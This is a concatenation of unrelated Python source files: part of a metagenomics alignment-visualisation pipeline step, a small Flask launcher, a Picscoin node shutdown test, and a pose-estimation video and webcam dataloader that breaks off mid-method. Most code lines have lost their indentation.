with open_file_db_by_extension(nt_loc_db, IdSeqDictValue.VALUE_TYPE_ARRAY) as nt_loc_dict:
log.write("Getting sequences by accession list from file...")
PipelineStepGenerateAlignmentViz.get_sequences_by_accession_list_from_file(
groups, nt_loc_dict, nt_db)
for _accession_id, ad in groups.items():
ad['coverage_summary'] = PipelineStepGenerateAlignmentViz.calculate_alignment_coverage(
ad)
result_dict, to_be_deleted = self.populate_reference_sequences(groups)
# Delete temp files
def safe_multi_delete(files):
for f in files:
try:
os.remove(f)
except:
pass
deleter_thread = threading.Thread(
target=safe_multi_delete, args=[to_be_deleted])
deleter_thread.start()
self.dump_align_viz_json(output_json_dir, db_type, result_dict)
deleter_thread.join()
# Write summary file
summary_msg = f"Read2Seq Size: {len(read2seq)}, M8 lines {line_count}, " \
f"{len(groups)} unique accession ids "
summary_file_name = f"{output_json_dir}.summary"
with open(summary_file_name, 'w') as summary_f:
summary_f.write(summary_msg)
def process_reads_from_m8_file(self, annotated_m8, read2seq):
# Go through m8 file and infer the alignment info. Grab the fasta
# sequence, lineage info.
groups = {}
line_count = 0
with open(annotated_m8, 'r') as m8f:
for line in m8f:
line_count += 1
if line_count % 100000 == 0:
log.write(f"{line_count} lines in the m8 file processed.")
line_columns = line.rstrip().split("\t")
read_id = line_columns[0]
seq_info = read2seq.get(read_id)
if seq_info:
accession_id = line_columns[1]
metrics = line_columns[2:]
# "ad" is short for "accession_dict" aka "accession_info"
ad = groups.get(accession_id, {'reads': []})
sequence, ad['family_id'], ad['genus_id'], ad[
'species_id'] = seq_info
ref_start = int(metrics[-4])
ref_end = int(metrics[-3])
if ref_start > ref_end: # SWAP
ref_start, ref_end = ref_end, ref_start
ref_start -= 1
prev_start = ref_start - self.REF_DISPLAY_RANGE
if prev_start < 0:
prev_start = 0
post_end = ref_end + self.REF_DISPLAY_RANGE
markers = prev_start, ref_start, ref_end, post_end
ad['reads'].append([read_id, sequence, metrics, markers])
base_url = "https://www.ncbi.nlm.nih.gov/nuccore"
ad['ref_link'] = f"{base_url}/{accession_id}?report=fasta"
groups[accession_id] = ad
log.write(f"{line_count} lines in the m8 file")
log.write(f"{len(groups)} unique accession ids")
return groups, line_count
def populate_reference_sequences(self, groups):
result_dict = {}
to_be_deleted = []
error_count = 0 # Cap max errors
ref_seq_not_found_message = "REFERENCE SEQUENCE NOT FOUND"
# "ad" is short for "accession_dict" aka "accession_info"
# NOTE: - If groups was generated by the get_sequences_by_accession_list_from_file method,
# then ad['ref_seq'] already contains the reference sequence.
# - If groups was generated by the get_sequences_by_accession_list_from_s3 method,
# then ad does not yet contain a key 'ref_seq' and instead the reference sequence
# needs to be read from one of the "accession files" downloaded in that method.
for accession_id, ad in groups.items():
try:
tmp_file = f'accession-{accession_id}'
if ad['ref_seq_len'] <= self.MAX_SEQ_DISPLAY_SIZE and 'ref_seq' not in ad:
if ad['ref_seq_len'] == 0:
ad['ref_seq'] = ref_seq_not_found_message
else:
with open(tmp_file, "rb") as tf:
ad['ref_seq'] = tf.read()
to_be_deleted.append(tmp_file)
if 'ref_seq' in ad:
ref_seq = ad['ref_seq']
for read in ad['reads']:
prev_start, ref_start, ref_end, post_end = read[3]
if ref_seq == ref_seq_not_found_message:
read[3] = ['', '', '']
else:
read[3] = [
ref_seq[prev_start:ref_start],
ref_seq[ref_start:ref_end],
ref_seq[ref_end:post_end]
]
if type(ref_seq) is bytes:
read[3] = [segment.decode('utf-8') for segment in read[3]]
else:
# The reference sequence is too long to read entirely in RAM,
# so we only read the mapped segments.
with open(tmp_file, "rb") as tf:
for read in ad['reads']:
prev_start, ref_start, ref_end, post_end = read[3]
tf.seek(prev_start, 0)
segment = tf.read(post_end - prev_start)
read[3] = [
segment[0:(ref_start - prev_start)].decode('utf-8'),
segment[(ref_start - prev_start):(
ref_end - prev_start)].decode('utf-8'),
segment[(ref_end - prev_start):(
post_end - prev_start)].decode('utf-8')
]
to_be_deleted.append(tmp_file)
if ad['ref_seq_len'] > self.MAX_SEQ_DISPLAY_SIZE:
ad['ref_seq'] = '...Reference Seq Too Long ...'
if type(ad['ref_seq']) is bytes:
ad['ref_seq'] = ad['ref_seq'].decode('utf-8')
except:
ad['ref_seq'] = "ERROR ACCESSING REFERENCE SEQUENCE FOR ACCESSION " \
"ID {}".format(accession_id)
if error_count == 0:
# Print stack trace for first error
traceback.print_exc()
error_count += 1
finally:
family_id = ad.pop('family_id')
genus_id = ad.pop('genus_id')
species_id = ad.pop('species_id')
family_dict = result_dict.get(family_id, {})
genus_dict = family_dict.get(genus_id, {})
species_dict = genus_dict.get(species_id, {})
species_dict[accession_id] = ad
genus_dict[species_id] = species_dict
family_dict[genus_id] = genus_dict
result_dict[family_id] = family_dict
if error_count > 10:
# Fail this many and the job is toast
msg = "Sorry, could not access reference sequences for over " \
"{error_count} accession IDs.".format(error_count=error_count)
raise RuntimeError(msg)
return result_dict, to_be_deleted
def dump_align_viz_json(self, output_json_dir, db_type, result_dict):
def align_viz_name(tag, lin_id):
return f"{output_json_dir}/{db_type}.{tag}.{int(lin_id)}.align_viz.json"
# Generate JSON files for the align_viz folder
command.make_dirs(output_json_dir)
for (family_id, family_dict) in result_dict.items():
fn = align_viz_name("family", family_id)
with open(fn, 'w') as out_f:
json.dump(family_dict, out_f)
for (genus_id, genus_dict) in family_dict.items():
fn = align_viz_name("genus", genus_id)
with open(fn, 'w') as out_f:
json.dump(genus_dict, out_f)
for (species_id, species_dict) in genus_dict.items():
fn = align_viz_name("species", species_id)
with open(fn, 'w') as out_f:
json.dump(species_dict, out_f)
self.additional_output_folders_hidden.append(output_json_dir)
@staticmethod
def parse_reads(annotated_fasta, db_type):
read2seq = {}
search_string = f"species_{db_type}"
adv_search_string = r"family_%s:([-\d]+):.*genus_%s:([-\d]+):.*species_%s:(" \
r"[-\d]+).*NT:[^:]*:(.*)" % (
db_type, db_type, db_type)
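        # Illustrative header shape these regexes expect (hypothetical values, not the exact
        # idseq annotation format):
        #   >family_nt:543:genus_nt:561:species_nt:562:...:NT:XYZ00001.1:read_1
        # groups 1-3 of adv_search_string are the lineage ids and group 4 is the read id.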
with open(annotated_fasta, 'r') as af:
read_id = ''
for line in af:
if line[0] == '>':
read_id = line
else:
sequence = line
m = re.search(r"%s:([\d-]*)" % search_string, read_id)
if m:
species_id = int(m.group(1))
if species_id > 0 or species_id < INVALID_CALL_BASE_ID:
# Match found
ma = re.search(adv_search_string, read_id)
if ma:
read2seq[ma.group(4).rstrip()] = [
sequence.rstrip(),
ma.group(1),
ma.group(2),
ma.group(3)
]
return read2seq
@staticmethod
def get_sequences_by_accession_list_from_file(accession2seq, nt_loc_dict,
nt_file):
with open(nt_file) as ntf:
for accession_id, accession_info in accession2seq.items():
ref_seq, seq_name = PipelineStepGenerateAlignmentViz.get_sequence_by_accession_id_ntf(
accession_id, nt_loc_dict, ntf)
accession_info['ref_seq'] = ref_seq
accession_info['ref_seq_len'] = len(ref_seq)
accession_info['name'] = seq_name
# This is now only used by Phylo tree. Please don't call it with long lists; it's now sequential.
@staticmethod
def get_sequences_by_accession_list_from_s3(accession_id_groups, nt_loc_dict, nt_s3_path):
index_errors = 0
nt_bucket, nt_key = nt_s3_path[5:].split("/", 1)
for accession_id, accession_info in accession_id_groups.items():
try:
entry = nt_loc_dict.get(accession_id)
ref_seq_len, seq_name, accession_file = PipelineStepGenerateAlignmentViz.get_sequence_by_accession_id_s3(
accession_id, entry, nt_bucket, nt_key)
accession_info['seq_file'] = accession_file
accession_info['ref_seq_len'] = ref_seq_len
accession_info['name'] = seq_name
except IndexError:
if index_errors == 0:
# Since we are swallowing all these exceptions, print one stack trace, for debugging,
# just in case it's an IndexError unrelated to the specific case we are tolerating.
# (should probably have a more specific exception class for that)
log.write(traceback.format_exc())
index_errors += 1
                # all other exceptions are immediately re-raised
if index_errors:
log.write(f"Some accessions (count: {index_errors}) could not be found in nt_db.")
@staticmethod
def get_sequence_by_accession_id_ntf(accession_id, nt_loc_dict, ntf):
ref_seq = ''
seq_name = ''
entry = nt_loc_dict.get(accession_id)
if entry:
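            # An nt_loc_dict entry is (byte offset of the record in the nt file, header-line
            # length, sequence length) -- see get_sequence_by_accession_id_s3 below -- so the
            # read below returns the FASTA header line followed by the sequence.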
range_start = int(entry[0])
seq_len = int(entry[1]) + int(entry[2])
ntf.seek(range_start, 0)
seq_name, ref_seq = ntf.read(seq_len).split("\n", 1)
ref_seq = ref_seq.replace("\n", "")
seq_name = seq_name.split(" ", 1)[1]
return ref_seq, seq_name
# This is now only used by Phylo tree
@staticmethod
def get_sequence_by_accession_id_s3(accession_id, entry, nt_bucket, nt_key):
seq_len = 0
seq_name = ''
if not entry:
return seq_len, seq_name, None
range_start, name_length, seq_len = [int(e) for e in entry]
accession_file = f'accession-{accession_id}'
num_retries = 3
for attempt in range(num_retries):
try:
range_file = f'range-{attempt}-accession-{accession_id}'
range_end = range_start + name_length + seq_len - 1
s3.fetch_byterange(range_start, range_end, nt_bucket, nt_key, range_file)
# (1) Take everything below the first two lines, remove the
# newlines chars, and put the sequence into accession_file
# (2) Send the first line to stdout
cmd = """cat {range_file} |tail -n+2 |tr -d '\\n' > {accession_file}; cat {range_file} |head -1""".format(range_file=range_file, accession_file=accession_file)
seq_name = subprocess.check_output(
cmd, executable='/bin/bash', shell=True).decode("utf-8").split(" ", 1)[1]
seq_name = seq_name.replace("\n", "")
# Get the sequence length based on the file size
seq_len = os.stat(accession_file).st_size
break
except IndexError as e:
# This may occur if the byterange fetched above is empty or does not properly align to an accession.
# This has occurred in the past when a reference cache issue caused the nt_loc_db and nt indices to be out of sync.
# Such issues should be investigated. However, the pipeline step can still complete with the missing data.
log.write("ntDbIndexError: Failed to get nt sequence by accession ID"
f"{accession_id} {range_start} {range_end} {nt_bucket} {nt_key}: {e}")
raise
except:
if attempt + 1 < num_retries: # Exponential backoff
time.sleep(1.0 * (4 ** attempt))
else:
log.write(f"All retries failed for getting sequence by accession ID {accession_id}.")
raise
finally:
try:
os.remove(range_file)
except:
pass
accession_file_full_path = f"{os.getcwd()}/{accession_file}"
return seq_len, seq_name, accession_file_full_path
@staticmethod
def compress_coverage(coverage):
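        # Collapse runs of consecutive positions with equal depth into "start-end" keys,
        # e.g. (illustrative) {3: 1, 4: 1, 5: 1, 9: 2} becomes {"3-5": 1, "9-9": 2}.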
keys = sorted(coverage.keys())
if len(keys) <= 1:
return coverage
output = {}
start = keys[0]
current = start
val = coverage[start]
for k in keys[1:]:
if (k - current) == 1 and coverage[k] == val:
current = k
else:
output[f"{start}-{current}"] = val
start = k
current = k
val = coverage[k]
output[f"{start}-{current}"] = val
return output
@staticmethod
def calculate_alignment_coverage(alignment_data):
ref_len = alignment_data['ref_seq_len']
# Setup. Can be implemented more cleanly.
coverage = defaultdict(lambda: 0)
output = {
'ref_seq_len': ref_len,
'total_read_length': 0,
'total_aligned_length': 0,
'total_mismatched_length': 0,
'num_reads': 0
}
if ref_len == 0:
return output
reads = alignment_data['reads']
for read in reads:
seq = read[1]
m8_metrics = read[2]
ref_start = int(m8_metrics[-4])
ref_end = int(m8_metrics[-3])
if ref_start > ref_end: # SWAP
ref_start, ref_end = ref_end, ref_start
ref_start -= 1
output['total_read_length'] += len(seq)
output['total_aligned_length'] += (ref_end - ref_start)
output['total_mismatched_length'] += int(m8_metrics[2])
output['num_reads'] += 1
for bp in range(ref_start, ref_end):
coverage[bp] += 1
output['distinct_covered_length'] = len(coverage)
output[
'coverage'] = PipelineStepGenerateAlignmentViz.compress_coverage(
coverage)
return output
|
main.py
|
from flask import Flask
from flask_restful import Api
from ressources import Bluetooth, task
import threading
app = Flask(__name__)
api = Api(app)
api.add_resource(Bluetooth, '/')
def first_func():
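    # Note: app.run() starts Flask's development server; because it runs in a worker thread
    # here, debug/reloader must stay off (the default), since the reloader only works in the
    # main thread.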
app.run()
def second_func():
task.main()
if __name__ == '__main__':
first_thread = threading.Thread(target=first_func)
second_thread = threading.Thread(target=second_func)
first_thread.start()
second_thread.start()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Picscoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test picscoind shutdown."""
from test_framework.test_framework import PicscoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(PicscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
dataloader copy.py
|
import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from matching import candidate_reselect as matching
from SPPE.src.utils.eval import getPrediction, getMultiPeakPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class Image_loader(data.Dataset):
def __init__(self, im_names, format='yolo'):
super(Image_loader, self).__init__()
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
def getitem_ssd(self, index):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
return im, inp, im_name
def getitem_yolo(self, index):
inp_dim = int(opt.inp_dim)
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im, orig_img, im_dim = prep_image(im_name, inp_dim)
#im_dim = torch.FloatTensor([im_dim]).repeat(1, 2)
inp = load_image(im_name)
return im, inp, orig_img, im_name, im_dim
def __getitem__(self, index):
if self.format == 'ssd':
return self.getitem_ssd(index)
elif self.format == 'yolo':
return self.getitem_yolo(index)
else:
raise NotImplementedError
def __len__(self):
return len(self.imglist)
class ImageLoader:
def __init__(self, im_names, batchSize=1, format='yolo', queueSize=50):
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
self.batchSize = batchSize
self.datalen = len(self.imglist)
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if self.format == 'ssd':
if opt.sp:
p = Thread(target=self.getitem_ssd, args=())
else:
p = mp.Process(target=self.getitem_ssd, args=())
elif self.format == 'yolo':
if opt.sp:
p = Thread(target=self.getitem_yolo, args=())
else:
p = mp.Process(target=self.getitem_yolo, args=())
else:
raise NotImplementedError
p.daemon = True
p.start()
return self
def getitem_ssd(self):
length = len(self.imglist)
for index in range(length):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
while self.Q.full():
time.sleep(2)
self.Q.put((im, inp, im_name))
def getitem_yolo(self):
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
im_name_k = self.imglist[k].rstrip('\n').rstrip('\r')
im_name_k = os.path.join(self.img_dir, im_name_k)
img_k, orig_img_k, im_dim_list_k = prep_image(im_name_k, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def getitem(self):
return self.Q.get()
def length(self):
return len(self.imglist)
def len(self):
return self.Q.qsize()
class VideoLoader:
def __init__(self, path, batchSize=1, queueSize=50):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.path = path
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def length(self):
return self.datalen
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
stream = cv2.VideoCapture(self.path)
assert stream.isOpened(), 'Cannot capture source'
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
(grabbed, frame) = stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.Q.put((None, None, None, None))
                    print('===========================> This video has '+str(k)+' frames in total.')
sys.stdout.flush()
return
# process and add the frame to the queue
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(k)+'.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
return self.Q.qsize()
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
self.datalen = self.dataloder.length()
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
for i in range(self.num_batches):
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
if img is None:
self.Q.put((None, None, None, None, None, None, None))
return
with torch.no_grad():
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
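                # (note) the detector ran on a letterboxed det_inp_dim x det_inp_dim input, so
                # subtract the padding offset and divide by the scaling factor to map the boxes
                # back to each original image's resolution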
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:,0]==k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH, opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k, scores[dets[:,0]==k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
self.datalen = self.detectionLoader.datalen
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = pQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
for i in range(self.datalen):
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1, pt2) = self.detectionLoader.read()
if orig_img is None:
self.Q.put((None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put((None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class VideoDetectionLoader:
def __init__(self, path, batchSize=4, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
def length(self):
return self.datalen
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole video
for i in range(self.num_batches):
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], boxes[dets[:,0]==k], scores[dets[:,0]==k]))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class WebcamLoader:
def __init__(self, webcam, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
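        # A LIFO queue is used so read() always returns the most recent webcam frame;
        # update() below drops the backlog whenever the queue fills up.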
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
            # ensure the queue has room in it
if not self.Q.full():
# read the next frame from the file
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img, orig_img, dim = prep_frame(frame, inp_dim)
inp = im_to_torch(orig_img)
im_dim_list = torch.FloatTensor([dim]).repeat(1, 2)
self.Q.put((img, orig_img, inp, im_dim_list))
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self, save_video=False,
savepath='examples/res/1.avi', fourcc=cv2.VideoWriter_fourcc(*'XVID'), fps=25, frameSize=(640,480),
queueSize=1024):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
